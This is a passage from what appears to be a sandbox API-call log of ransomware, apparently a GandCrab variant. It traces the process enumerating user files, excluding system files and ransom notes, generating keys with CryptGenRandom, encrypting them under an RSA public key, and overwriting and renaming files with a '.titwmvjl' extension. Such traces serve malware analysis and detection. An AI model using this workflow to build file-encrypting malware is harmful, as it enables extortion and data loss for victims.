lpString2="bootsect.bak") returned 1 [0086.122] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0086.122] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0086.122] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0086.122] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.122] FindNextFileW (in: hFindFile=0x5037f8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 0 [0086.122] FindClose (in: hFindFile=0x5037f8 | out: hFindFile=0x5037f8) returned 1 [0086.122] CloseHandle (hObject=0x2b4) returned 1 [0086.123] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0086.123] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0086.123] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0086.123] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\TITWMVJL-DECRYPT.txt" [0086.123] lstrlenW (lpString=".titwmvjl") returned 9 [0086.123] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\TITWMVJL-DECRYPT.txt") returned 58 [0086.123] VirtualAlloc (lpAddress=0x0, dwSize=0xb4, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0086.123] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 67 [0086.123] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\TITWMVJL-DECRYPT.txt") returned 58 [0086.123] lstrlenW (lpString=".txt") returned 4 [0086.123] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0086.123] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0086.123] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0086.123] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.123] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\TITWMVJL-DECRYPT.txt") returned 58 [0086.123] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\TITWMVJL-DECRYPT.txt") returned 58 [0086.123] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0086.123] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0086.124] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0086.124] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0086.124] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0086.124] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0086.124] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0086.124] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0086.124] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.124] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0086.124] lstrcmpW (lpString1="u5MvgM3W2.png", lpString2=".") returned 1 [0086.124] lstrcmpW (lpString1="u5MvgM3W2.png", lpString2="..") returned 1 [0086.124] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="u5MvgM3W2.png" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\u5MvgM3W2.png") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\u5MvgM3W2.png" [0086.124] lstrlenW (lpString=".titwmvjl") returned 9 [0086.124] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\u5MvgM3W2.png") returned 51 [0086.124] VirtualAlloc (lpAddress=0x0, dwSize=0xa6, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0086.124] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\u5MvgM3W2.png.titwmvjl") returned 60 [0086.124] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\u5MvgM3W2.png") returned 51 [0086.124] lstrlenW (lpString=".png") returned 4 [0086.124] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0086.124] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".png ") returned 5 [0086.124] lstrcmpiW (lpString1=".png", lpString2=".titwmvjl") returned -1 [0086.124] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.125] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\u5MvgM3W2.png") returned 51 [0086.125] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\u5MvgM3W2.png") returned 51 [0086.125] lstrcmpiW (lpString1="u5MvgM3W2.png", lpString2="desktop.ini") returned 1 [0086.125] lstrcmpiW (lpString1="u5MvgM3W2.png", lpString2="autorun.inf") returned 1 [0086.125] lstrcmpiW (lpString1="u5MvgM3W2.png", lpString2="ntuser.dat") returned 1 [0086.125] lstrcmpiW (lpString1="u5MvgM3W2.png", lpString2="iconcache.db") returned 1 [0086.125] lstrcmpiW (lpString1="u5MvgM3W2.png", lpString2="bootsect.bak") returned 1 [0086.125] lstrcmpiW (lpString1="u5MvgM3W2.png", lpString2="boot.ini") returned 1 [0086.125] lstrcmpiW (lpString1="u5MvgM3W2.png", lpString2="ntuser.dat.log") returned 1 [0086.125] lstrcmpiW (lpString1="u5MvgM3W2.png", lpString2="thumbs.db") returned 1 [0086.125] lstrcmpiW (lpString1="u5MvgM3W2.png", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0086.125] lstrcmpiW (lpString1="u5MvgM3W2.png", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0086.125] lstrcmpiW (lpString1="u5MvgM3W2.png", lpString2="KRAB-DECRYPT.html") returned 1 [0086.125] lstrcmpiW (lpString1="u5MvgM3W2.png", lpString2="CRAB-DECRYPT.html") returned 1 [0086.125] lstrcmpiW (lpString1="u5MvgM3W2.png", lpString2="KRAB-DECRYPT.txt") returned 1 [0086.125] lstrcmpiW (lpString1="u5MvgM3W2.png", lpString2="CRAB-DECRYPT.txt") returned 1 [0086.125] lstrcmpiW (lpString1="u5MvgM3W2.png", lpString2="ntldr") returned 1 [0086.125] lstrcmpiW (lpString1="u5MvgM3W2.png", lpString2="NTDETECT.COM") returned 1 [0086.125] lstrcmpiW (lpString1="u5MvgM3W2.png", lpString2="Bootfont.bin") returned 1 [0086.125] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\u5MvgM3W2.png") returned 51 [0086.125] lstrlenW (lpString=".png") returned 4 [0086.125] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0086.125] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".png ") returned 5 [0086.125] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.125] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0086.126] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\u5MvgM3W2.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\u5mvgm3w2.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0086.126] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.126] ReadFile (in: hFile=0x2b4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0086.127] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.127] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.127] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0086.128] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0086.129] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0086.129] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0086.129] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0086.129] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.129] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0086.129] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.129] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.129] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0086.130] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0086.131] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0086.131] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0086.131] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0086.131] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.131] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0086.131] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.131] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.131] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0086.132] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.132] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503278) returned 1 [0086.133] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.133] CryptGetKeyParam (in: hKey=0x503278, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0086.133] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.133] CryptEncrypt (in: hKey=0x503278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f130*=0x100) returned 1 [0086.133] GetLastError () returned 0x0 [0086.133] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.133] CryptDestroyKey (hKey=0x503278) returned 1 [0086.133] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.134] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0086.134] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.134] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0086.135] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.135] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503478) returned 1 [0086.135] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.135] CryptGetKeyParam (in: hKey=0x503478, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0086.135] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.135] CryptEncrypt (in: hKey=0x503478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f130*=0x100) returned 1 [0086.136] GetLastError () returned 0x0 [0086.136] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.136] CryptDestroyKey (hKey=0x503478) returned 1 [0086.136] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.136] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0086.136] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0086.136] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0086.136] ReadFile (in: hFile=0x2b4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f1dc*=0x570b, lpOverlapped=0x0) returned 1 [0086.149] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xffffa8f5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.149] WriteFile (in: hFile=0x2b4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x570b, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f1c0*=0x570b, lpOverlapped=0x0) returned 1 [0086.152] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.152] WriteFile (in: hFile=0x2b4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0086.153] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.157] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.157] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.158] CloseHandle (hObject=0x2b4) returned 1 [0086.158] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\u5MvgM3W2.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\u5mvgm3w2.png"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\u5MvgM3W2.png.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\u5mvgm3w2.png.titwmvjl"), dwFlags=0x1) returned 1 [0086.159] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.159] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0086.159] lstrcmpW (lpString1="uy9N7OujPEEHlg4 _s.bmp", lpString2=".") returned 1 [0086.159] lstrcmpW (lpString1="uy9N7OujPEEHlg4 _s.bmp", lpString2="..") returned 1 [0086.159] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="uy9N7OujPEEHlg4 _s.bmp" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\uy9N7OujPEEHlg4 _s.bmp") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\uy9N7OujPEEHlg4 _s.bmp" [0086.159] lstrlenW (lpString=".titwmvjl") returned 9 [0086.159] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\uy9N7OujPEEHlg4 _s.bmp") returned 60 [0086.159] VirtualAlloc (lpAddress=0x0, dwSize=0xb8, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0086.159] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\uy9N7OujPEEHlg4 _s.bmp.titwmvjl") returned 69 [0086.159] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\uy9N7OujPEEHlg4 _s.bmp") returned 60 [0086.160] lstrlenW (lpString=".bmp") returned 4 [0086.160] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0086.160] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".bmp ") returned 5 [0086.160] lstrcmpiW (lpString1=".bmp", lpString2=".titwmvjl") returned -1 [0086.160] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.160] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\uy9N7OujPEEHlg4 _s.bmp") returned 60 [0086.160] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\uy9N7OujPEEHlg4 _s.bmp") returned 60 [0086.160] lstrcmpiW (lpString1="uy9N7OujPEEHlg4 _s.bmp", lpString2="desktop.ini") returned 1 [0086.160] lstrcmpiW (lpString1="uy9N7OujPEEHlg4 _s.bmp", lpString2="autorun.inf") returned 1 [0086.160] lstrcmpiW (lpString1="uy9N7OujPEEHlg4 _s.bmp", lpString2="ntuser.dat") returned 1 [0086.160] lstrcmpiW (lpString1="uy9N7OujPEEHlg4 _s.bmp", lpString2="iconcache.db") returned 1 [0086.160] lstrcmpiW (lpString1="uy9N7OujPEEHlg4 _s.bmp", lpString2="bootsect.bak") returned 1 [0086.160] lstrcmpiW (lpString1="uy9N7OujPEEHlg4 _s.bmp", lpString2="boot.ini") returned 1 [0086.160] lstrcmpiW (lpString1="uy9N7OujPEEHlg4 _s.bmp", lpString2="ntuser.dat.log") returned 1 [0086.160] lstrcmpiW (lpString1="uy9N7OujPEEHlg4 _s.bmp", lpString2="thumbs.db") returned 1 [0086.160] lstrcmpiW (lpString1="uy9N7OujPEEHlg4 _s.bmp", lpString2="TITWMVJL-DECRYPT.txt") returned 1 [0086.160] lstrcmpiW (lpString1="uy9N7OujPEEHlg4 _s.bmp", lpString2="TITWMVJL-DECRYPT.html") returned 1 [0086.160] lstrcmpiW (lpString1="uy9N7OujPEEHlg4 _s.bmp", lpString2="KRAB-DECRYPT.html") returned 1 [0086.160] lstrcmpiW (lpString1="uy9N7OujPEEHlg4 _s.bmp", lpString2="CRAB-DECRYPT.html") returned 1 [0086.160] lstrcmpiW (lpString1="uy9N7OujPEEHlg4 _s.bmp", lpString2="KRAB-DECRYPT.txt") returned 1 [0086.160] lstrcmpiW (lpString1="uy9N7OujPEEHlg4 _s.bmp", lpString2="CRAB-DECRYPT.txt") returned 1 [0086.160] lstrcmpiW (lpString1="uy9N7OujPEEHlg4 _s.bmp", lpString2="ntldr") returned 1 [0086.160] lstrcmpiW (lpString1="uy9N7OujPEEHlg4 _s.bmp", lpString2="NTDETECT.COM") returned 1 [0086.160] lstrcmpiW (lpString1="uy9N7OujPEEHlg4 _s.bmp", lpString2="Bootfont.bin") returned 1 [0086.160] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\uy9N7OujPEEHlg4 _s.bmp") returned 60 [0086.160] lstrlenW (lpString=".bmp") returned 4 [0086.160] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0086.161] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".bmp ") returned 5 [0086.161] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.161] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0086.161] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\uy9N7OujPEEHlg4 _s.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\uy9n7oujpeehlg4 _s.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2b4 [0086.161] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.162] ReadFile (in: hFile=0x2b4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f1dc*=0x21c, lpOverlapped=0x0) returned 1 [0086.162] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.162] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.162] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0086.163] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0086.164] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0086.164] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0086.164] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f198 | out: pbBuffer=0x259f198) returned 1 [0086.164] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.164] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0086.164] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.164] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.164] CryptAcquireContextW (in: phProv=0x259f10c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f10c*=0x4c9980) returned 1 [0086.165] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0086.166] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0086.166] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0086.166] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f1b8 | out: pbBuffer=0x259f1b8) returned 1 [0086.166] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.166] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0086.166] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.166] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.166] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0086.168] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.168] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x5034f8) returned 1 [0086.168] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.168] CryptGetKeyParam (in: hKey=0x5034f8, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0086.168] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.168] CryptEncrypt (in: hKey=0x5034f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f130*=0x100) returned 1 [0086.169] GetLastError () returned 0x0 [0086.169] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.169] CryptDestroyKey (hKey=0x5034f8) returned 1 [0086.169] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.169] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0086.169] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.169] CryptAcquireContextW (in: phProv=0x259f100, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f100*=0x4c9980) returned 1 [0086.170] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.170] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f104 | out: phKey=0x259f104*=0x503938) returned 1 [0086.170] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.171] CryptGetKeyParam (in: hKey=0x503938, dwParam=0x8, pbData=0x259f0f8, pdwDataLen=0x259f0fc, dwFlags=0x0 | out: pbData=0x259f0f8*=0x800, pdwDataLen=0x259f0fc*=0x4) returned 1 [0086.171] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.171] CryptEncrypt (in: hKey=0x503938, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f130*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f130*=0x100) returned 1 [0086.171] GetLastError () returned 0x0 [0086.171] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.171] CryptDestroyKey (hKey=0x503938) returned 1 [0086.171] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0086.171] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0086.171] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0086.171] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0086.172] ReadFile (in: hFile=0x2b4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f1dc, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f1dc*=0x30ba, lpOverlapped=0x0) returned 1 [0086.185] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0xffffcf46, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.185] WriteFile (in: hFile=0x2b4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x30ba, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f1c0*=0x30ba, lpOverlapped=0x0) returned 1 [0086.186] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.186] WriteFile (in: hFile=0x2b4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, 